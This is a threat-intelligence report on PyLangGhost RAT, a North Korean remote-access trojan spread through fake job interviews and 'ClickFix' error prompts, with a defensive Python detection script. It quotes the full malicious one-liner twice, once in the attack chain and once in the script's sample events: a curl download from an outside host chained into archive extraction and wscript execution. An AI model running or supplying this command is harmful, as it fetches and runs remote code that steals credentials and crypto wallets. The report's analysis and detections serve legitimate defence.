North Korean state-sponsored groups continue to innovate in their campaigns against financial institutions and cryptocurrency platforms. A newly discovered malware, PyLangGhost RAT, has emerged as a Python-based reimplementation of GoLangGhost RAT, attributed to the Lazarus subgroup Famous Chollima.
Unlike traditional malware distributed through cracked software or removable media, PyLangGhost RAT relies on highly targeted social engineering tactics, notably fake developer job interviews and staged business calls. Victims are tricked into executing malicious “fixes” for fabricated camera or microphone errors, ultimately granting full remote access to North Korean operators.
This discovery, credited to researcher Heiner García Pérez of BlockOSINT, highlights the evolving sophistication of DPRK’s “ClickFix” campaigns.
Threat Attribution
- Threat Actor: Lazarus Group – Subgroup “Famous Chollima”
- Targeted Sectors: Technology, Finance, and Cryptocurrency
- Motivation: Financial gain, cryptocurrency theft, espionage
- TTP Evolution: From bogus coding challenges and fake VC meetings to ClickFix scenarios where victims copy/paste malicious commands into terminals
Attack Chain Overview
- Initial Access – Fake job offers/interviews redirect victims to malicious sites.
- Social Engineering (ClickFix) – Users encounter fake errors (e.g., “Race Condition in Windows Camera Discovery Cache”).
- Execution – Victims copy/paste a malicious command:
curl -k -o "%TEMP%\nvidiaRelease.zip" https://360scanner.store/cam-v-b74si.fix && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\update.vbs"
- Persistence – Registry keys set via update.vbs.
- Payload Deployment – A disguised Python environment (csshost.exe) launches nvidia.py, importing malicious modules (config.py, api.py, command.py, util.py, auto.py).
- Data Theft – Browser-stored credentials and crypto wallet data exfiltrated.
- C2 Communication – Weak RC4/MD5 encryption over raw IP addresses with no TLS.
Malware Capabilities
- Credential Theft: Dumps Chrome-stored passwords and cookies (v10–v20+ bypass supported).
- Crypto Wallet Theft: Targets MetaMask, BitKeep, Coinbase Wallet, Phantom extensions.
- Privilege Escalation: Abuses deceptive UAC prompts and LSASS impersonation for SYSTEM-level access.
- Persistence: Registry-based; prevents multiple instances from running by using a pseudo-mutex mechanism.
- C2 Communication: No TLS, relies on obfuscated RC4 packets and raw IPs.
MITRE ATT&CK Mapping
- T1036 – Masquerading: Renames python.exe → csshost.exe
- T1059 – Command & Scripting Interpreter: Executes via wscript.exe and Python loader
- T1083 – File and Directory Discovery: Enumerates browser profiles and extensions
- T1012 – Query Registry: Gains persistence through registry keys
- T1555 – Credentials from Password Stores: Exfiltrates Chrome credentials and cookies
Business Impact
- Financial Losses: Direct theft of cryptocurrency assets.
- Data Breaches: Exposure of corporate and customer information.
- Operational Disruption: Remote control and potential lateral movement.
- Reputational Damage: Public association with a Lazarus breach erodes trust.
- Regulatory Risk: Non-compliance penalties (GDPR, CCPA, financial oversight).
Defensive Recommendations
- Awareness Training: Educate staff, especially developers and executives, about ClickFix social engineering tactics.
- Privilege Management: Restrict local admin rights; enforce least-privilege access.
- Network Monitoring: Detect anomalous outbound traffic to raw IPs and non-TLS RC4 communications.
- Endpoint Security: Deploy EDR solutions with behavior-based detection to flag suspicious use of wscript.exe and renamed binaries.
- Browser Hardening: Disable unused extensions; enforce secure storage policies for credentials.
- Incident Response: Establish a workflow for sandboxing suspicious scripts and verifying “technical fix” instructions received during interviews.
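To make the Network Monitoring and Endpoint Security recommendations concrete, here is an added triage example (not code from the original report or from any vendor) that runs simple detections over constructed Sysmon-style process and network events modelled on the attack chain above. Field names (Image, OriginalFileName, CommandLine, DestinationIp, DestinationHostname, DestinationPort), the Temp path and the 203.0.113.10 address are assumptions; the C2 heuristic uses a literal IP with no resolved hostname and a non-443 port as a stand-in for "no TLS", since the report gives no C2 addresses.

```python
import re
from ipaddress import ip_address

# Constructed Sysmon-style events (not real telemetry); the IP is a documentation address
EVENTS = [
    {"type": "process", "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'curl -k -o "%TEMP%\\nvidiaRelease.zip" https://360scanner.store/cam-v-b74si.fix'
                    ' && powershell -Command "Expand-Archive -Force -Path \'%TEMP%\\nvidiaRelease.zip\''
                    ' -DestinationPath \'%TEMP%\\nvidiaRelease\'" && wscript "%TEMP%\\nvidiaRelease\\update.vbs"'},
    {"type": "process", "Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'wscript "C:\Users\dev\AppData\Local\Temp\nvidiaRelease\update.vbs"'},
    {"type": "process", "Image": r"C:\Users\dev\AppData\Local\Temp\nvidiaRelease\csshost.exe",
     "OriginalFileName": "python.exe", "CommandLine": "csshost.exe nvidia.py"},
    {"type": "network", "Image": r"C:\Users\dev\AppData\Local\Temp\nvidiaRelease\csshost.exe",
     "DestinationIp": "203.0.113.10", "DestinationHostname": "", "DestinationPort": 8080},
    {"type": "process", "Image": r"C:\Python312\python.exe", "OriginalFileName": "python.exe",
     "CommandLine": "python.exe build.py"},  # benign: interpreter keeps its real name
]

# curl with certificate checks disabled, chained into Expand-Archive and then wscript (the ClickFix one-liner)
CHAIN = re.compile(r"\bcurl\b.*\s-k\b.*&&.*expand-archive.*&&\s*wscript\b", re.I | re.S)
TEMP_VBS = re.compile(r"(%temp%|\\temp)\\.*\.vbs", re.I)

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def process_findings(ev):
    hits = []
    cmd, img = ev.get("CommandLine", ""), basename(ev["Image"])
    if CHAIN.search(cmd):
        hits.append("clickfix_curl_expand_wscript_chain")
    if img == "wscript.exe" and TEMP_VBS.search(cmd):
        hits.append("wscript_vbs_from_temp")
    # PE version info still says python.exe although the file on disk was renamed (T1036)
    if ev.get("OriginalFileName", "").lower() == "python.exe" and img != "python.exe":
        hits.append("renamed_python_interpreter")
    return hits

def network_findings(ev):
    try:
        ip_address(ev.get("DestinationIp", ""))
    except ValueError:
        return []  # no literal IP to evaluate
    # literal IP, no DNS name, non-443 port: heuristic for the raw-IP, non-TLS C2 described above
    if not ev.get("DestinationHostname") and ev.get("DestinationPort") != 443:
        return ["raw_ip_non_tls_port"]
    return []

def triage(events):
    return [process_findings(e) if e["type"] == "process" else network_findings(e) for e in events]
```

Each event yields the list of matched indicators, so the benign python.exe launch produces none while the chain, the Temp-path VBScript, the renamed interpreter and the raw-IP beacon each produce one.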